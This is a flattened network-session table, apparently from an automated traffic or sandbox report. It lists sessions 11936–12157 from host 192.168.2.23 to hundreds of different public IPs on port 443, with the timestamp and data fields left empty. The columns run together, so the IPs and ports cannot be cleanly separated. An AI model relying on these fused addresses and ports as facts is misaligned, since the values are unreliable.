                                                11936192.168.2.2336780120.35.252.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11937192.168.2.235478863.201.25.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11938192.168.2.2341560160.169.21.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11939192.168.2.23535225.65.188.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11940192.168.2.2349572117.162.161.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11941192.168.2.236076497.220.244.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11942192.168.2.235712282.86.4.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11943192.168.2.234778872.49.51.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11944192.168.2.2357586206.157.199.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11945192.168.2.2334300124.30.98.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11946192.168.2.2338364150.62.202.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11947192.168.2.235118212.212.142.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11948192.168.2.2334056203.42.106.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11949192.168.2.23595001.78.173.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11950192.168.2.2337700105.31.127.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11951192.168.2.233538689.250.134.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11952192.168.2.2344458213.151.89.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11953192.168.2.2338344187.125.68.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11954192.168.2.2349242136.106.206.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11955192.168.2.2335904150.155.222.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11956192.168.2.2340108205.247.220.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11957192.168.2.233346053.102.121.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11958192.168.2.235770418.20.241.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11959192.168.2.2344768125.177.194.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11960192.168.2.2349442134.31.128.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11961192.168.2.2359560206.151.98.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11962192.168.2.233743817.247.110.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11963192.168.2.233910639.103.40.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11964192.168.2.2358328153.89.91.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11965192.168.2.2351620148.106.242.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11966192.168.2.235372248.37.23.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11967192.168.2.2339028188.71.230.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11968192.168.2.233627660.24.230.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11969192.168.2.2347294120.193.85.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11970192.168.2.2343180210.70.232.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11971192.168.2.2349748178.81.53.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11972192.168.2.2341936181.220.252.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11973192.168.2.2359102132.63.48.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11974192.168.2.2357166171.181.0.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11975192.168.2.234679414.122.246.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11976192.168.2.235648837.178.68.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11977192.168.2.234106047.146.211.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11978192.168.2.2335344201.72.101.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11979192.168.2.2356526111.117.68.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11980192.168.2.233618814.182.176.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11981192.168.2.234311483.249.94.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11982192.168.2.2353464171.194.35.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11983192.168.2.2346516113.22.183.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11984192.168.2.235796463.75.71.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11985192.168.2.234160673.235.212.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11986192.168.2.235294648.11.203.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11987192.168.2.2350992134.86.170.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11988192.168.2.2359524143.14.21.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11989192.168.2.2346884201.117.169.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11990192.168.2.2340596179.112.22.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11991192.168.2.2342372209.145.222.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11992192.168.2.2359662200.223.14.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11993192.168.2.233316427.193.135.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11994192.168.2.234390493.219.138.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11995192.168.2.2334514128.142.224.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11996192.168.2.2339456118.26.60.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11997192.168.2.236095491.75.128.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11998192.168.2.2338442136.204.179.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11999192.168.2.2340844161.156.183.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12000192.168.2.234396046.168.116.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12001192.168.2.2333994194.101.216.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12002192.168.2.234141895.129.56.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12003192.168.2.235727489.71.57.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12004192.168.2.2341572132.254.203.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12005192.168.2.2344212149.241.136.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12006192.168.2.2354996192.198.229.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12007192.168.2.233372053.29.101.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12008192.168.2.2334672135.61.5.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12009192.168.2.23489221.139.235.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12010192.168.2.2351088125.208.0.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12011192.168.2.2343854148.233.58.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12012192.168.2.2356558125.159.153.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12013192.168.2.2357054207.238.82.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12014192.168.2.235178496.223.171.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12015192.168.2.2339906181.67.198.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12016192.168.2.234912812.19.76.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12017192.168.2.2358692124.155.181.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12018192.168.2.234087890.88.66.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12019192.168.2.2338630159.209.192.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12020192.168.2.233353869.40.253.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12021192.168.2.2341388113.229.21.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12022192.168.2.235472884.24.77.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12023192.168.2.2360670159.179.237.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12024192.168.2.2360670208.57.156.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12025192.168.2.234514681.176.99.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12026192.168.2.233703264.79.52.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12027192.168.2.235480432.17.56.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12028192.168.2.2353016222.106.21.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12029192.168.2.234678848.209.207.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12030192.168.2.234246490.178.155.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12031192.168.2.2338376104.88.188.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12032192.168.2.2338562140.199.179.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12033192.168.2.235914695.236.70.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12034192.168.2.234585466.112.9.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12035192.168.2.233593896.43.200.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12036192.168.2.2353934188.7.88.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12037192.168.2.2337120123.16.211.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12038192.168.2.2334994123.164.10.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12039192.168.2.2360828201.162.252.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12040192.168.2.233323034.92.210.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12041192.168.2.2351332208.1.171.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12042192.168.2.233729074.18.110.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12043192.168.2.234167474.85.173.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12044192.168.2.2333046113.38.38.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12045192.168.2.234418294.87.252.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12046192.168.2.2348520155.108.134.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12047192.168.2.2352438121.148.219.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12048192.168.2.235849458.203.184.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12049192.168.2.2360990168.176.205.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12050192.168.2.2337652205.167.134.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12051192.168.2.2346976186.180.219.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12052192.168.2.2344352160.80.67.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12053192.168.2.2334952117.245.167.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12054192.168.2.2336022207.122.170.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12055192.168.2.2344354212.83.138.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12056192.168.2.2342402186.55.124.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12057192.168.2.2336752130.197.84.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12058192.168.2.2344590203.178.131.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12059192.168.2.2352342222.152.72.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12060192.168.2.2345724158.190.95.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12061192.168.2.233848490.181.10.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12062192.168.2.2351146146.27.240.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12063192.168.2.2333130180.58.73.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12064192.168.2.2353602216.110.119.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12065192.168.2.2349300175.240.126.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12066192.168.2.235613219.19.150.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12067192.168.2.2352078107.162.108.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12068192.168.2.2352222139.67.239.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12069192.168.2.2333318188.251.135.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12070192.168.2.235745099.36.74.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12071192.168.2.234629067.189.8.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12072192.168.2.2358856136.33.122.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12073192.168.2.2334132128.179.75.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12074192.168.2.234244020.100.33.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12075192.168.2.2360554204.54.198.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12076192.168.2.23591428.153.176.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12077192.168.2.233881659.15.99.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12078192.168.2.2352056203.188.18.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12079192.168.2.2340296130.127.190.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12080192.168.2.2336380168.65.202.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12081192.168.2.2341668110.117.247.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12082192.168.2.2352740176.156.20.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12083192.168.2.2347226206.138.38.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12084192.168.2.234495884.86.17.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12085192.168.2.2340896163.79.184.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12086192.168.2.2338542130.61.85.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12087192.168.2.2347692185.82.26.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12088192.168.2.234819636.160.151.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12089192.168.2.2334168158.28.237.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12090192.168.2.2349238195.54.195.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12091192.168.2.2355190162.148.133.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12092192.168.2.233840468.174.1.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12093192.168.2.2355530166.225.108.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12094192.168.2.2353090123.253.144.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12095192.168.2.2347654153.160.22.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12096192.168.2.2350294161.52.176.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12097192.168.2.2349314149.234.72.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12098192.168.2.2342478131.62.148.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12099192.168.2.2356670147.168.37.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12100192.168.2.2348200184.210.229.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12101192.168.2.234733060.125.31.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12102192.168.2.235969831.87.32.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12103192.168.2.234387491.176.242.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12104192.168.2.234958063.47.1.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12105192.168.2.234721285.143.91.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12106192.168.2.234239291.5.157.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12107192.168.2.234122641.113.233.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12108192.168.2.235486840.147.209.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12109192.168.2.235151657.87.134.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12110192.168.2.233824683.183.162.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12111192.168.2.2360950132.64.121.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12112192.168.2.233360696.171.228.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12113192.168.2.234519043.206.98.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12114192.168.2.234757823.85.164.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12115192.168.2.235457699.194.88.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12116192.168.2.2346130210.156.4.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12117192.168.2.2350712162.141.107.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12118192.168.2.234821075.141.30.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12119192.168.2.235859414.221.167.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12120192.168.2.2356290147.200.26.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12121192.168.2.233591274.158.52.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12122192.168.2.233977494.190.151.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12123192.168.2.2356906126.124.201.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12124192.168.2.2360016159.184.235.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12125192.168.2.2334164171.102.206.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12126192.168.2.234589238.113.2.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12127192.168.2.2347868205.96.116.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12128192.168.2.2350458208.38.35.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12129192.168.2.234225438.169.64.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12130192.168.2.233858057.67.211.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12131192.168.2.234431234.221.40.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12132192.168.2.234275237.13.116.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12133192.168.2.2352794198.2.236.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12134192.168.2.2342282212.229.168.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12135192.168.2.2338216103.174.148.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12136192.168.2.234690018.59.250.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12137192.168.2.233884437.172.0.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12138192.168.2.2356144132.236.167.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12139192.168.2.235372481.176.231.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12140192.168.2.234528891.54.85.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12141192.168.2.2349906108.19.24.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12142192.168.2.2357720154.131.186.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12143192.168.2.235898861.143.17.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12144192.168.2.2338596103.89.139.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12145192.168.2.2354878191.219.124.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12146192.168.2.234090038.186.69.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12147192.168.2.2344984108.194.227.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12148192.168.2.2342394123.213.190.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12149192.168.2.2348648106.0.39.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12150192.168.2.2359338177.25.238.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12151192.168.2.2349146172.229.21.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12152192.168.2.2336976132.37.172.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12153192.168.2.2355934150.31.123.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12154192.168.2.2360408185.147.93.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12155192.168.2.2352616111.249.100.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12156192.168.2.233499091.44.151.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12157192.168.2.234401835.205.44.198443
                                                TimestampBytes transferredDirectionData


